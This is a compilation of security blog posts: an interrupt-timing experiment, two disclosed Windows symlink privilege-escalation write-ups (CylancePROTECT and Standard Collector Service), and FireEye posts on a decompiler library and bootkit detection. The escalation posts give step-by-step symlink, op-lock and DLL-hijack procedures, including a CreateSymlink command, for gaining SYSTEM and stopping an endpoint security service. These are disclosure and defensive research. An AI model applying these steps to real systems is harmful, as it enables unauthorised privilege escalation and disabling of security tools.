I did also play around with this stuff on arm64 a bit, and I was wondering: At what points do interrupts actually get delivered? Does an incoming interrupt force the CPU to drop everything immediately, or do inflight operations finish first? This gets particularly interesting on phones that contain two or three different types of CPUs mixed together.
On a Pixel 4 (which has 4 slow in-order cores, 3 fast cores, and 1 faster core), I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register, while running this loop:
400680: 91000442 add x2, x2, #0x1
400684: 91000421 add x1, x1, #0x1
400688: 9ac20820 udiv x0, x1, x2
40068c: 91006800 add x0, x0, #0x1a
400690: 91000400 add x0, x0, #0x1
400694: 91000442 add x2, x2, #0x1
400698: 91000421 add x1, x1, #0x1
40069c: 91000442 add x2, x2, #0x1
4006a0: 91000421 add x1, x1, #0x1
4006a4: 9ac20820 udiv x0, x1, x2
4006a8: 91006800 add x0, x0, #0x1a
4006ac: 91000400 add x0, x0, #0x1
4006b0: 91000442 add x2, x2, #0x1
4006b4: 91000421 add x1, x1, #0x1
4006b8: 91000442 add x2, x2, #0x1
4006bc: 91000421 add x1, x1, #0x1
4006c0: 17fffff0 b 400680 <main+0xe0>
The logged interrupt PCs had the following distribution on a slow in-order core:
and this distribution on a fast out-of-order core:
As always, out-of-order (OOO) cores make everything weird, and the start of the loop seems to somehow "provide cover" for the following instructions; but on the in-order core, we can see that more interrupts arrive after the slow udiv instructions. So apparently, when one of those is executing while an interrupt arrives, it continues executing and doesn't get aborted somehow?
With the following loop, which has a LDR instruction mixed in that accesses a memory location that is constantly being modified by another thread:
4006a0: 91000442 add x2, x2, #0x1
4006a4: 91000421 add x1, x1, #0x1
4006a8: 9ac20820 udiv x0, x1, x2
4006ac: 91006800 add x0, x0, #0x1a
4006b0: 91000400 add x0, x0, #0x1
4006b4: 91000442 add x2, x2, #0x1
4006b8: 91000421 add x1, x1, #0x1
4006bc: 91000442 add x2, x2, #0x1
4006c0: 91000421 add x1, x1, #0x1
4006c4: 9ac20820 udiv x0, x1, x2
4006c8: 91006800 add x0, x0, #0x1a
4006cc: 91000400 add x0, x0, #0x1
4006d0: 91000442 add x2, x2, #0x1
4006d4: f9400061 ldr x1, [x3]
4006d8: 91000421 add x1, x1, #0x1
4006dc: 91000442 add x2, x2, #0x1
4006e0: 91000421 add x1, x1, #0x1
4006e4: 17ffffef b 4006a0 <main+0x100>
the cache-missing loads obviously have a large influence on the timing. On the in-order core:
On the OOO core:
What is interesting to me here is that the timer interrupts seem to again arrive after the slow load - implying that if an interrupt arrives while a slow memory access is in progress, the interrupt handler may not get to execute until the memory access has finished? (Unless maybe on the OOO core the interrupt handler can start speculating already? I wouldn't really expect that, but could imagine it.)
On an X86 Skylake CPU, we can do a similar test:
11b8: 48 83 c3 01 add $0x1,%rbx
11bc: 48 83 c0 01 add $0x1,%rax
11c0: 48 01 d8 add %rbx,%rax
11c3: 48 83 c3 01 add $0x1,%rbx
11c7: 48 83 c0 01 add $0x1,%rax
11cb: 48 01 d8 add %rbx,%rax
11ce: 48 03 02 add (%rdx),%rax
11d1: 48 83 c0 01 add $0x1,%rax
11d5: 48 83 c3 01 add $0x1,%rbx
11d9: 48 01 d8 add %rbx,%rax
11dc: 48 83 c3 01 add $0x1,%rbx
11e0: 48 83 c0 01 add $0x1,%rax
11e4: 48 01 d8 add %rbx,%rax
11e7: eb cf jmp 11b8 <main+0xf8>
with a similar result:
This means that if the first access to the file terminated our race window (which is not the case), we probably wouldn't be able to win the race by making the access to the file slow - instead we'd have to slow down one of the operations before that. (But note that I have only tested simple loads, not stores or read-modify-write operations here.)
If you regularly perform penetration tests, red team exercises, or endpoint assessments, chances are you've probably encountered CylancePROTECT at some point. Depending on the CylancePROTECT policy configuration, your standard tools and techniques may not have worked as expected. I've ran into situations where the administrators of CylancePROTECT set the policy to be too relaxed and establishing a presence on the target system was trivial. With that said, I've also encountered targets where the policy was very strict and gaining a stable, reliable shell was not an easy task.
After a few frustrating CylancePROTECT encounters, I decided to install it locally and learn more about how it works to try and make my next encounter less frustrating. The majority of CylancePROTECT is written in .NET, so I started by firing up dnSpy, loaded the assemblies, and started looking around. I spent several nights and weekends casually looking through the codebase (which is quite massive) and found myself spending most of my time analyzing how the CylanceUI process communicated with the CylanceSvc process. My hope was that I would find a secret command I could use to stop the service as a user, but no such command exists (for users). However, I did find a privilege escalation vulnerability that could be triggered as a user via the inter-process communication ("IPC") channels.
Several commands can be sent to the CylanceSvc from the CylanceUI process via the tray menu, some of which are enabled by starting the UI with the advanced flag: CylanceUI.exe /advanced
Prior to starting a deeper investigation of the different menu options, I used Process Monitor to get high level view of how CylancePROTECT interacted with Windows when I clicked these menu options. My favorite option ended up being the logging verbosity, not only because it gave me an even deeper insight into what CylancePROTECT was doing, but also because it plays a major role in this privilege escalation vulnerability. The 'Check for Updates' option also caught my eye in procmon because it caused the CyUpdate process to spawn as SYSTEM.
The procmon output I witnessed at this point told me quite a bit and was what made me begin my hunt for a possible privilege escalation vulnerability. The three main indicators were:
As a user, I could communicate with the CylanceSvc service and influences its behavior
As a user, I could trigger the CyUpdate process to spawn with SYSTEM privileges
As a user, I could cause the CylanceUI process to write to the same file/folder as the SYSTEM process
The third indicator is the most important. It’s not uncommon for a user process and system process to share the same resource, but it is uncommon for the user process to have full read/write permissions to that resource. I confirmed the permissions on the log folder and files with icacls:
Having modify permissions on a folder will allow for it to be setup as a mount point to redirect read/write operations to another location. I confirmed this by using James Forshaw's symboliclink-testing-tools to create a mount point, as well as try other symbolic link vectors. Before creating the mount point, I made sure to set CylancePROTECT’s log level to 'Error' to prevent additional logs from being created after I emptied the log folder.
After creating the mount point, I increased the log verbosity and confirmed the log file was created in the mount point target folder, C:\Windows.
Writing a log file to an arbitrary location is neat but doesn't demonstrate much impact or add value to an attack vector. To gain SYSTEM privileges with this vector, I needed to be able to control the filename that was written, as well as the contents of the file. Neither of these tasks can be accomplished by interacting with CylancePROTECT via the IPC channels. However, I was able to use one of Forshaw's clever symbolic link tricks to control the name of the file. This is done by using two symbolic links that are setup like this:
C:\Program Files\Cylance\Desktop\log mount point folder points to the \RPC Control\ object directory.
\RPC Control\2018-03-20.log symlink points to \??\C:\Windows\evil.dll
One of James' symbolic link testing tools will automatically create this symlink chain by simply specifying the original file and target destination, in this case the command looked like this, CreateSymlink.exe "C:\Program Files\Cylance\Desktop\log\2018-03-20.log" C:\Windows\evil.dll, and the result was:
At this point I've written a file to an arbitrary location with an arbitrary name and since the CyUpdate.exe process grants Users modify permissions on the "log file", I could overwrite the log contents with the contents of a DLL.
From here all I needed to get a SYSTEM shell was a DLL hijack in a SYSTEM service. I decided to target CylancePROTECT for this because I knew I could reliably spawn the CyUpdate process as a user. Leveraging Procmon again, I set my filters to:
Path contains .dll
Result contains NOT
Process is CyUpdate.exe
The resulting output in procmon looked like this:
Now all I had to do was setup the chain again, but this time point the symlink to C:\Program Files\Cylance\Desktop\libc.dll (any of the highlighted locations would have worked). This symlink gave me a modifiable DLL that I could force CylancePROTECT to load and execute, resulting in a SYSTEM shell:
Elevating our privileges from a user to SYSTEM is great, but more importantly, we meet the conditions required to communicate with the CylancePROTECT kernel driver CYDETECT. This elevated privilege allows us to send the ENABLE_STOP IOCTL code to the kernel driver and gracefully stop the service. In the screenshot above, you’ll notice the CylanceSvc is stopped as a result of loading the DLL.
Privilege escalation vulnerabilities via symbolic links are quite common. James Forshaw has found many of them in Windows and other Microsoft products. The initial identification of these types of bugs can be performed without ever opening IDA or doing any sort of static analysis, as I’ve demonstrated above. With that said, it is still a good idea to find the offending code and determine if it’s within a library that affects multiple services or an isolated issue.
Preventing symbolic link attacks may not be as easy as you would think. From a developer’s perspective, these types of vulnerabilities don’t stand out like a SQLi, XSS, or RCE bug since they’re typically a hard to spot permissions issue. When privileged services need to share file system resources with low-privileged users, it is very important that the user permissions are minimal.
Upon finding this vulnerability, Cylance was contacted, and a collaborative effort was made through Bugcrowd to remediate the finding. Cylance responded to the submission quickly and validated the finding within a few days. The fix was deployed 40 days after the submission and was included in the 1470 release of CylancePROTECT.
If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson
Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0003.
The CVE assigned to this vulnerability is: CVE-2018-10722
Process Monitor has become a favorite tool of mine for both research and development. During development of offensive security tools, I frequently use it to monitor how the tools interact with Windows and how they might be detected. Earlier this year I noticed some interesting behavior while I was debugging some code in Visual Studio and monitoring with Procmon. Normally I setup exclusion filters for Visual Studio processes to reduce the noise, but prior to setting up the filters I notice a SYSTEM process writing to a user owned directory:
When a privileged service writes to a user owned resource, it opens up the possibility of symlink attack vector, as previously shown in the Cylance privilege escalation bug I found. With the goal of identifying how I can directly influence the service's behavior, I began my research into the Standard Collector Service by reviewing the service's loaded libraries:
The library paths indicated the Standard Collector Service was a part of Visual Studio's diagnostics tools. After reviewing the libraries and executables in the related folders, I identified several of the binaries were written in .NET, including a standalone CLI tool named VSDiagnostics.exe, here is the console output:
Loading VSDiagnostics into dnSpy revealed a lot about the tool as well as how it interacts with the Standard Collector Service. First, an instance of IStandardCollectorService is acquired and a session configuration is used to create an ICollectionSession:
Next, agents are added to the ICollectionSession with a CLSID and DLL name, which also stood out as an interesting user controlled behavior. It also made me remember previous research that exploited this exact behavior DLL loading behavior. At this point, it looked like the Visual Studio Standard Collector Service was very similar or the same as the Diagnostics Hub Standard Collector Service included with Windows 10. I began investigating this assumption by using OleViewDotNet to query the services for their supported interfaces:
Viewing the proxy definition of the IStandardCollectorService revealed other familiar interfaces, specifically the ICollectionSession interface seen in the VSDiagnostics source:
Taking note of the Interface ID ("IID"), I returned to the .NET interop library to compare the IIDs and found that they were different:
Looking deeper into the .NET code, I found that these Visual Studio specific interfaces are loaded through the proxy DLLs:
A quick review of the ManualRegisterInterfaces function in the DiagnosticsHub.StandardCollector.Proxy.dll showed a simple loop that iterates over an array of IIDs. Included in the array of IIDs is one belonging to the ICollectionSession:
After I had a better understanding of the Visual Studio Collector service, I wanted to see if I could reuse the same .NET interop code to control the Windows Collector service. In order to interact with the correct service, I had to replace the Visual Studio CLSIDs and IIDs with the correct Windows Collector service CLSIDs and IIDs. Next, I used the modified code to build a client that simply created and started a diagnostics session with the collector service:
Starting Procmon and running the client resulted in several files and folders being created in the specified C:\Temp scratch directory. Analyzing these events in Procmon showed that the initial directory creation was performed with client impersonation:
Although the initial directory was created while impersonating the client, the subsequent files and folders were created without impersonation:
After taking a deeper look at the other file operations, there were several that stood out. The image below is an annotated break down of the various file operations performed by the Standard Collector Service:
The most interesting behavior is the file copy operation that occurs during the diagnostics report creation. The image below shows the corresponding call stack and events of this behavior:
Now that I've identified user influenced behaviors, I construct a possible arbitrary file creation exploit plan:
Obtain op-lock on merged ETL file ({GUID}.1.m.etl) as soon as service calls CloseFile
Find and convert report sub-folder as mount point to C:\Windows\System32
Replace contents of {GUID}.1.m.etl with malicious DLL
Release op-lock to allow ETL file to be copied through the mount point
Start new collection session with copied ETL as agent DLL, triggering elevated code execution
To write the exploit, I extended the client from earlier by leveraging James Forshaw's NtApiDotNet C# library to programmatically create the op-lock and mount point. The images below shows code snippet used to acquire the op-lock and the corresponding Procmon output illustrating the loop and op-lock acquisition:
Acquiring an op-lock on the file essentially stops the CopyFile race, allows the contents to be overwritten, and provides control of when the CopyFile occurs. Next, the exploit looks for the Report folder and scans it for the randomly named sub directory that needs to be converted to a mount point. Once the mount point is successfully created, the contents of the .etl are replaced with a malicious DLL. Finally, the .etl file is closed and the op-lock is released, allowing the CopyFile operation to continue. The code snippet and Procmon output for this step is shown in the images below:
There are several techniques for escalating privileges through an arbitrary file write, but for this exploit, I chose to use the Collector service's agent DLL loading capability to keep it isolated to a single service. You'll notice in the image above, I did not use the mount point + symlink trick to rename the file to a .dll because DLLs can be loaded with any extension. For the purpose of this exploit the DLL simply needed to be in the System32 folder for the Collector service to load it. The image below demonstrates successful execution of the exploit and the corresponding Procmon output:
I know that the above screenshots show the exploit was run as the user "Admin", so here is a GIF showing it being ran as "bob", a low-privileged user account:
Feel free to try out the SystemCollector PoC yourself. Turning the PoC into a portable exploit for offensive security engagements is a task I'll leave to the reader. The NtApiDotNet library is also a PowerShell module, which should make things a bit easier.
After this bug was patched as part of the August 2018 Patch Tuesday, I began reversing the patch, which was relatively simple. As expected, the patch simply added CoImpersonateClient calls prior to the previously vulnerable file operations, specifically the CommitPackagingResult function in DiagnosticsHub.StandardCollector.Runtime.dll:
As previously mentioned in the Cylance privilege escalation write-up, protecting against symlink attacks may seem easy, but is often times overlooked. Any time a privileged service is performing file operations on behalf of a user, proper impersonation is needed in order to prevent these types of attacks.
Upon finding this vulnerability, MSRC was contacted with the vulnerability details and PoC. MSRC quickly triaged and validated the finding and provided regular updates throughout the remediation process. The full disclosure timeline can be found in the Atredis advisory link below.
If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson
Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0004
The CVE assigned to this vulnerability is: CVE-2018-0952
CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service
IDA Pro and the Hex Rays decompiler are a core part of any toolkit
for reverse engineering and vulnerability research. In a previous blog
post we discussed how the Hex-Rays
API can be used to solve small, well-defined problems commonly
seen as part of malware analysis. Having access to a higher-level
representation of binary code makes the Hex-Rays decompiler a powerful
tool for reverse engineering. However, interacting with the HexRays
API and its underlying data sources can be daunting, making the
creation of generic analysis scripts difficult or tedious.
This blog post introduces the FLARE IDA Decompiler Library
(FIDL), FireEye’s open source library which provides a wrapper
layer around the Hex-Rays API.
Background
Output from the Hex-Rays decompiler is exposed to analysts via an
Abstract Syntax Tree (AST). Out of the box, processing a binary using
the Hex-Rays API means iterating this AST using a tree visitor class
which visits each node in the tree and issues a callback. For every
callback we can check to see what kind of node we are visiting (calls,
additions, assignments, etc.) and then process that node. For more
information on these constructs see our previous blog post.
The Problem
While powerful, this workflow can be difficult to use when creating
a generic API for several reasons:
The order nodes are visited in, is not always obvious based on
the decompiler output
When visiting a node, we have no
context about where we are in the AST
Any problem which
requires multiple steps requires multiple visitors or complicated
logic in our callback function
The amount of cases to
handle when walking up or down the AST can increase
exponentially
Handling each of these cases in a single visitor callback function
is untenable, so we need a way to more flexibly interact with the decompiler.
FIDL
FIDL, the FLARE IDA
Decompiler Library, is our implementation of a wrapper around
the Hex-Rays API. FIDL’s main goal is to abstract away the lower level
details of the default decompiler API. FIDL solves multiple problems:
Provides analysts an easy-to-understand API layer which can be
used to write more complicated binary processing scripts
Abstracts away the minutiae of processing the AST
Provides helper implementations for commonly needed
functionality when working with the decompiler
Provides
documented examples on how to use various Hex-Rays APIs
Many of FIDL’s benefits are exposed to users via the
controlFlowinator class. When constructing this object FIDL will parse
the AST for us and provides a high-level summary of a function using
information extracted via the decompiler including APIs called, their
parameters, and a summary of local variables and parameters for the function.
Figure 1 shows a subset of information available via a
controlFlowinator next to the decompilation of the function.
Figure 1: Sample output available as part
of a controlFlowinator
When parsing the AST during construction, the controlFlowinator also
combines nodes representing the same logical expression into a more
digestible form where each block translates roughly to one line of
pseudocode. Figure 2 and Figure 3 show the AST and controlFlowinator
representations of the same function.
Figure 2: The default rendering of the
AST of a function
Figure 3: The control flow graph created
by the controlFlowinator for the function shown in Figure 2
Compared to the default AST, this graph is organized by potential
code paths that can be taken through a function. This gives analysts a
much more logical structure to iterate when trying to determine
context for a particular expression.
Readily available access to variables and API calls used in a
function makes creating scripts to leverage the Hex-Rays API much more
straightforward. In our previous blog post we introduced a script
which uses the HexRays API to rename global variables based on the
parameter to GetProcAddress. Figure 4 shows this script rewritten
using the FIDL API. This new script is both easier to understand and
does not rely on manually walking the AST.
Figure 4: Script that uses the FIDL API
to map all calls to GetProcAddress to global variables
Rather than calling GetProcAddress malware commonly manually
revolves needed imports by walking the Export Address Table (EAT) and
comparing the hashes of a DLL’s exports looking for pre-computed
values. As an analyst being able to quickly or automatically map these
functions to their intended API makes it easier for us to identify
which functions we should spend time analyzing. Figure 5 shows an
example of how FIDL can be used to handle these cases. This script
targets a DRIDEX sample with MD5 hash
7B82CF2CF9D08191C6828C3F62A2F914. This binary uses CRC32 with an XOR
key of 0x65C54023 as the hashing algorithm during import resolution.
Figure 5: IDAPython script to
automatically process and markup a DRIDEX sample
Running the above script results in output similar to what is shown
in Figure 6, with comments labeling which functions are resolved.
Figure 6: The script in Figure 5 inserts
comments into the decompiler output annotating decrypted strings
While the Hex-Rays decompiler is a powerful source of information
during reverse engineering, writing generic scripts and plugins using
the default API is difficult and requires handling numerous edge
cases. This post introduced the FIDL library, a wrapper
around the Hex-Rays API, which fixes this by reducing the amount of
low-level details an analyst needs to understand in order to create a
script leveraging the decompiler and should make the creation of these
scripts much faster. In future blog posts we will publish more scripts
and analysis utilizing this library.
The second issue is that reverse engineering all boot records is
impractical. Given the job of determining if a single system is
infected with a bootkit, a malware analyst could acquire a disk image
and then reverse engineer the boot bytes to determine if anything
malicious is present in the boot chain. However, this process takes
time and even an army of skilled reverse engineers wouldn’t scale to
the size of modern enterprise networks. To put this in context, the
compromised enterprise network referenced in our ROCKBOOT blog post had approximately
10,000 hosts. Assuming a minimum
of two boot records per host, a Master Boot Record (MBR) and a Volume
Boot Record (VBR), that is an average of 20,000 boot records to analyze! An
initial reaction is probably, “Why not just hash the boot records and
only analyze the unique ones?” One would assume that corporate
networks are mostly homogeneous, particularly with respect to boot
code, yet this is not the case. Using the same network as an example,
the 20,000 boot records reduced to only 6,000 unique records based on
MD5 hash. Table 1 demonstrates this using data we’ve collected across
our engagements for various enterprise sizes.
Enterprise Size (# hosts)
Avg # Unique Boot Records (md5)
100-1000
428
1000-10000
4,738
10000+
8,717
Table 1 – Unique boot records by MD5 hash
Now, the next thought might be, “Rather than hashing the entire
record, why not implement a custom hashing technique where only
subsections of the boot code are hashed, thus avoiding the dynamic
data portions?” We tried this as well. For example, in the case of
Master Boot Records, we used the bytes at the following two offsets to
calculate a hash:
md5( offset[0:218] + offset[224:440] )
In one network this resulted in approximately 185,000 systems
reducing to around 90 unique MBR hashes. However, this technique had
drawbacks. Most notably, it required accounting for numerous special
cases for applications such as Altiris, SafeBoot, and PGPGuard. This
required small adjustments to the algorithm for each environment,
which in turn required reverse engineering many records to find the
appropriate offsets to hash.
Ultimately, we concluded that to solve the problem we needed a
solution that provided the following:
A reliable collection of
boot records from systems
A behavioral analysis of boot
records, not just static analysis
The ability to analyze
tens of thousands of boot records in a timely manner
The remainder of this post describes how we solved each of these challenges.
Collect the Bytes
Malicious drivers insert themselves into the disk driver stack so
they can intercept disk I/O as it traverses the stack. They do this to
hide their presence (the real bytes) on disk. To address this attack
vector, we developed a custom kernel driver (henceforth, our “Raw
Read” driver) capable of targeting various altitudes in the disk
driver stack. Using the Raw Read driver, we identify the lowest level
of the stack and read the bytes from that level (Figure 1).
Figure 1: Malicious driver inserts itself
as a filter driver in the stack, raw read driver reads bytes from
lowest level
This allows us to bypass the rest of the driver stack, as well as
any user space hooks. (It is important to note, however, that if the
lowest driver on the I/O stack has an inline code hook an attacker can
still intercept the read requests.) Additionally, we can compare the
bytes read from the lowest level of the driver stack to those read
from user space. Introducing our first indicator of a compromised
boot system: the bytes retrieved from user space don’t match those
retrieved from the lowest level of the disk driver stack.
Analyze the Bytes
As previously mentioned, reverse engineering and static analysis are
impractical when dealing with hundreds of thousands of boot records.
Automated dynamic analysis is a more practical approach, specifically
through emulating the execution of a boot record. In more technical
terms, we are emulating the real mode instructions of a boot record.
The emulation engine that we chose is the Unicorn project. Unicorn
is based on the QEMU emulator and supports 16-bit real mode emulation.
As boot samples are collected from endpoint machines, they are sent to
the emulation engine where high-level functionality is captured during
emulation. This functionality includes events such as memory access,
disk reads and writes, and other interrupts that execute during emulation.
The Execution Hash
Folding down (aka stacking) duplicate samples is critical to reduce
the time needed on follow-up analysis by a human analyst. An
interesting quality of the boot samples gathered at scale is that
while samples are often functionally identical, the data they use
(e.g. strings or offsets) is often very different. This makes it quite
difficult to generate a hash to identify duplicates, as demonstrated
in Table 1. So how can we solve this problem with emulation? Enter the
“execution hash”. The idea is simple: during emulation, hash the
mnemonic of every assembly instruction that executes (e.g.,
“md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this
concept of hashing the assembly instruction as it executes to
ultimately arrive at the “execution hash”
Figure 2: Execution hash
Using this method, the 650,000 unique boot samples we’ve collected
to date can be grouped into a little more than 300 unique execution
hashes. This reduced data set makes it far more manageable to identify
samples for follow-up analysis. Introducing our second indicator of
a compromised boot system: an execution hash that is only found on a
few systems in an enterprise!
Behavioral Analysis
Like all malware, suspicious activity executed by bootkits can vary
widely. To avoid the pitfall of writing detection signatures for
individual malware samples, we focused on identifying behavior that
deviates from normal OS bootstrapping. To enable this analysis, the
series of instructions that execute during emulation are fed into an
analytic engine. Let's look in more detail at an example of malicious
functionality exhibited by several bootkits that we discovered by
analyzing the results of emulation.
Several malicious bootkits we discovered hooked the interrupt vector
table (IVT) and the BIOS Data Area (BDA) to intercept system
interrupts and data during the boot process. This can provide an
attacker the ability to intercept disk reads and also alter the
maximum memory reported by the system. By hooking these structures,
bootkits can attempt to hide themselves on disk or even in memory.
These hooks can be identified by memory writes to the memory ranges
reserved for the IVT and BDA during the boot process. The IVT
structure is located at the memory range 0000:0000h to 0000:03FCh and
the BDA is located at 0040:0000h. The malware can hook the interrupt
13h handler to inspect and modify disk writes that occur during the
boot process. Additionally, bootkit malware has been observed
modifying the memory size reported by the BIOS Data Area in order to
potentially hide itself in memory.
This leads us to our final category of indicators of a compromised
boot system: detection of suspicious behaviors such as IVT hooking,
decoding and executing data from disk, suspicious screen output from
the boot code, and modifying files or data on disk.
Do it at Scale
Dynamic analysis gives us a drastic improvement when determining the
behavior of boot records, but it comes at a cost. Unlike static
analysis or hashing, it is orders of magnitude slower. In our cloud
analysis environment, the average time to emulate a single record is
4.83 seconds. Using the compromised enterprise network that contained
ROCKBOOT as an example (approximately 20,000 boot records), it would
take more than 26 hours to dynamically analyze (emulate) the records
serially! In order to provide timely results to our analysts we needed
to easily scale our analysis throughput relative to the amount of
incoming data from our endpoint technologies. To further complicate
the problem, boot record analysis tends to happen in batches, for
example, when our endpoint technology is first deployed to a new enterprise.
With the advent of serverless cloud computing, we had the
opportunity to create an emulation analysis service that scales to
meet this demand – all while remaining cost effective. One of the
advantages of serverless computing versus traditional cloud instances
is that there are no compute costs during inactive periods; the only
cost incurred is storage. Even when our cloud solution receives tens
of thousands of records at the start of a new customer engagement, it
can rapidly scale to meet demand and maintain near real-time detection
of malicious bytes.
The cloud infrastructure we selected for our application is Amazon
Web Services (AWS). Figure 3 provides an overview of the architecture.
Figure 3: Boot record analysis workflow
Our design currently utilizes:
API Gateway to provide a RESTful interface.
Lambda functions to do validation, emulation, analysis, as
well as storage and retrieval of results.
DynamoDB to track progress of processed boot records through
the system.
S3 to store boot records and emulation reports.
The architecture we created exposes a RESTful API that provides a
handful of endpoints. At a high level the workflow is:
Endpoint agents in
customer networks automatically collect boot records using FireEye’s
custom developed Raw Read kernel driver (see “Collect the bytes”
described earlier) and return the records to FireEye’s Incident
Response (IR) server.
The IR server submits batches of boot
records to the AWS-hosted REST interface, and polls the interface
for batched results.
The IR server provides a UI for
analysts to view the aggregated results across the enterprise, as
well as automated notifications when malicious boot records are
found.
The REST API endpoints are exposed via AWS’s API Gateway, which then
proxies the incoming requests to a “submission” Lambda. The submission
Lambda validates the incoming data, stores the record (aka boot code)
to S3, and then fans out the incoming requests to “analysis” Lambdas.
The analysis Lambda is where boot record emulation occurs. Because
Lambdas are started on demand, this model allows for an incredibly
high level of parallelization. AWS provides various settings to
control the maximum concurrency for a Lambda function, as well as
memory/CPU allocations and more. Once the analysis is complete, a
report is generated for the boot record and the report is stored in
S3. The reports include the results of emulation and other metadata
extracted from the boot record (e.g., ASCII strings).
As described earlier, the IR server periodically polls the AWS REST
endpoint until processing is complete, at which time the report is downloaded.
Find More Evil in Big Data
Our workflow for identifying malicious boot records is only
effective when we know what malicious indicators to look for, or what
execution hashes to blacklist. But what if a new malicious boot record
(with a unique hash) evades our existing signatures?
For this problem, we leverage our in-house big data platform engine
that we integrated into FireEye
Helix following the acquisition of X15 Software. By loading the
results of hundreds of thousands of emulations into the engine X15,
our analysts can hunt through the results at scale and identify
anomalous behaviors such as unique screen prints, unusual initial jump
offsets, or patterns in disk reads or writes.
This analysis at scale helps us identify new and interesting samples
to reverse engineer, and ultimately helps us identify new detection
signatures that feed back into our analytic engine.
Conclusion
Within weeks of going live we detected previously unknown
compromised systems in multiple customer environments. We’ve
identified everything from ROCKBOOT and HDRoot!
bootkits to the admittedly humorous JackTheRipper,
a bootkit that spreads itself via floppy disk (no joke). Our system
has collected and processed nearly 650,000 unique records to date and
continues to find the evil needles (suspicious and malicious boot
records) in very large haystacks.
In summary, by combining advanced endpoint boot record extraction
with scalable serverless computing and an automated emulation engine,
we can rapidly analyze thousands of records in search of evil. FireEye
is now using this solution in both our Managed
Defense and Incident
Response offerings.
Acknowledgements
Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett
contributed to this blog post.